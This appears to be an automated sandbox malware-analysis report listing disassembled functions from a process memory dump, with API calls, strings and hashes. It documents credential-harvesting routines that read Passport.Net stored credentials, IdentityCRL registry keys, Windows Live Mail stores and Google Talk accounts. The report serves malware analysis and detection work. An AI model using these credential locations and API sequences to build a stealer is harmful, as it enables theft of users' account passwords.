                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 236 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->236 235->234 237 444c75-444c7e 235->237 246 444d02-444d0d __setusermatherr 236->246 247 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 236->247 239 444c80-444c85 237->239 240 444c9f-444ca3 237->240 239->234 241 444c8c-444c93 239->241 240->234 242 444ca5-444ca7 240->242 241->234 244 444c95-444c9d 241->244 245 444cad-444cb0 242->245 244->245 245->236 246->247 250 444da4-444da7 247->250 251 444d6a-444d72 247->251 252 444d81-444d85 250->252 253 444da9-444dad 250->253 254 444d74-444d76 251->254 255 444d78-444d7b 251->255 257 444d87-444d89 252->257 258 444d8b-444d9c GetStartupInfoA 252->258 253->250 254->251 254->255 255->252 256 444d7d-444d7e 255->256 256->252 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                • String ID: k:v
                                                                                                                • API String ID: 3662548030-4078055367
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 269 40fb00-40fb35 call 44b090 RegOpenKeyExA 272 40fc37-40fc3d 269->272 273 40fb3b-40fb4f RegOpenKeyExA 269->273 274 40fb55-40fb7e RegQueryValueExA 273->274 275 40fc2d-40fc31 RegCloseKey 273->275 276 40fc23-40fc27 RegCloseKey 274->276 277 40fb84-40fb93 call 404734 274->277 275->272 276->275 277->276 280 40fb99-40fbd1 call 4047a5 277->280 280->276 283 40fbd3-40fbdb 280->283 284 40fc19-40fc1d LocalFree 283->284 285 40fbdd-40fc14 memcpy * 2 call 40f802 283->285 284->276 285->284
                                                                                                                APIs
                                                                                                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                                • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                                                • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                • memcpy.MSVCRT ref: 0040FBE4
                                                                                                                • memcpy.MSVCRT ref: 0040FBF9
                                                                                                                  • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                  • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                  • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                  • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                                                                                • API String ID: 2768085393-2409096184
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0044430B
                                                                                                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                  • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                  • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                  • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                  • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                                                                                                                • memset.MSVCRT ref: 00444379
                                                                                                                • memset.MSVCRT ref: 00444394
                                                                                                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                • strlen.MSVCRT ref: 004443DB
                                                                                                                • _strcmpi.MSVCRT ref: 00444401
                                                                                                                Strings
                                                                                                                • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                • Store Root, xrefs: 004443A5
                                                                                                                • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                • API String ID: 832325562-2578778931
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 308 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 313 40f5c3-40f5ea RegQueryValueExA 308->313 314 40f6d9-40f6df 308->314 315 40f6d0-40f6d3 RegCloseKey 313->315 316 40f5f0-40f5f4 313->316 315->314 316->315 317 40f5fa-40f604 316->317 318 40f606-40f618 call 40466b call 404734 317->318 319 40f677 317->319 329 40f66a-40f675 call 404785 318->329 330 40f61a-40f63e call 4047a5 318->330 321 40f67a-40f67d 319->321 321->315 322 40f67f-40f6bf call 4012ee RegQueryValueExA 321->322 322->315 328 40f6c1-40f6cf 322->328 328->315 329->321 330->329 335 40f640-40f643 330->335 336 40f661-40f664 LocalFree 335->336 337 40f645-40f65a memcpy 335->337 336->329 337->336
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040F567
                                                                                                                • memset.MSVCRT ref: 0040F57F
                                                                                                                  • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                • memcpy.MSVCRT ref: 0040F652
                                                                                                                • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 2012582556-3916222277
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 338 4037ca-40381c memset * 2 call 444551 341 4038e2-4038e5 338->341 342 403822-403882 call 4021b6 call 406f06 * 2 strchr 338->342 349 403884-403895 _mbscpy 342->349 350 403897-4038a2 strlen 342->350 351 4038bf-4038dd _mbscpy call 4023e5 349->351 350->351 352 4038a4-4038bc sprintf 350->352 351->341 352->351
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004037EB
                                                                                                                • memset.MSVCRT ref: 004037FF
                                                                                                                  • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                  • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                                                                                • strchr.MSVCRT ref: 0040386E
                                                                                                                • _mbscpy.MSVCRT ref: 0040388B
                                                                                                                • strlen.MSVCRT ref: 00403897
                                                                                                                • sprintf.MSVCRT ref: 004038B7
                                                                                                                • _mbscpy.MSVCRT ref: 004038CD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                • String ID: %s@yahoo.com
                                                                                                                • API String ID: 317221925-3288273942
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 354 404a99-404ac2 LoadLibraryA 355 404ac4-404ad2 GetProcAddress 354->355 356 404aec-404af4 354->356 357 404ad4-404ad8 355->357 358 404add-404ae6 FreeLibrary 355->358 361 404af5-404afa 356->361 362 404adb 357->362 358->356 359 404ae8-404aea 358->359 359->361 363 404b13-404b17 361->363 364 404afc-404b12 MessageBoxA 361->364 362->358
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                • API String ID: 2780580303-317687271
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 365 4034e4-403544 memset * 2 call 410b1e 368 403580-403582 365->368 369 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 365->369 369->368
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00403504
                                                                                                                • memset.MSVCRT ref: 0040351A
                                                                                                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                • _mbscpy.MSVCRT ref: 00403555
                                                                                                                  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                • _mbscat.MSVCRT ref: 0040356D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                • API String ID: 3071782539-966475738
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 374 40f6e2-40f70a call 40466b call 4045db 379 40f710-40f717 call 404734 374->379 380 40f7e9-40f801 call 404656 call 404785 374->380 379->380 385 40f71d-40f72e CredReadA 379->385 385->380 388 40f734-40f73a 385->388 389 40f740-40f743 388->389 390 40f7e5 388->390 389->390 391 40f749-40f759 389->391 390->380 392 40f75a-40f770 391->392 392->392 393 40f772-40f795 call 4047a5 392->393 396 40f7e2 393->396 397 40f797-40f7b6 WideCharToMultiByte 393->397 396->390 398 40f7b8-40f7c6 strlen 397->398 399 40f7d9-40f7dc LocalFree 397->399 398->399 400 40f7c8-40f7d8 _mbscpy 398->400 399->396 400->399
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                • CredReadA.ADVAPI32(Passport.Net\*,00000004,00000000,?,?,00000000), ref: 0040F729
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                                • strlen.MSVCRT ref: 0040F7BE
                                                                                                                • _mbscpy.MSVCRT ref: 0040F7CF
                                                                                                                • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharCredFreeLocalMultiReadWidestrlen
                                                                                                                • String ID: Passport.Net\*
                                                                                                                • API String ID: 4000595657-3671122194
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 401 40ccd7-40cd06 ??2@YAPAXI@Z 402 40cd08-40cd0d 401->402 403 40cd0f 401->403 404 40cd11-40cd24 ??2@YAPAXI@Z 402->404 403->404 405 40cd26-40cd2d call 404025 404->405 406 40cd2f 404->406 408 40cd31-40cd57 405->408 406->408 410 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 408->410 411 40cd59-40cd60 DeleteObject 408->411 411->410
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2054149589-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                  • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                  • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                • memset.MSVCRT ref: 00408620
                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                • memset.MSVCRT ref: 00408671
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                                Strings
                                                                                                                • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                                • String ID: Software\Google\Google Talk\Accounts
                                                                                                                • API String ID: 1366857005-1079885057
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                 [Control-flow graph of the function at 0040BA28; nodes marked as executed or not executed. Graph image not preserved.]
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursor_mbsicmpqsort
                                                                                                                • String ID: /nosort$/sort
                                                                                                                • API String ID: 882979914-1578091866
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                                                  • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                • memset.MSVCRT ref: 00410E10
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                • _mbscpy.MSVCRT ref: 00410E87
                                                                                                                  • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                Strings
                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                • API String ID: 889583718-2036018995
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                • String ID:
                                                                                                                • API String ID: 3473537107-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004109F7
                                                                                                                  • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                  • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                                                                                                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                • memset.MSVCRT ref: 00410A32
                                                                                                                • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 3143880245-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@
                                                                                                                • String ID:
                                                                                                                • API String ID: 1033339047-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@mallocmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3831604043-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                  • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFontIndirect_mbscpymemset
                                                                                                                • String ID: Arial
                                                                                                                • API String ID: 3853255127-493054409
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: strlen$_strcmpimemset
                                                                                                                • String ID: /stext
                                                                                                                • API String ID: 520177685-3817206916
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
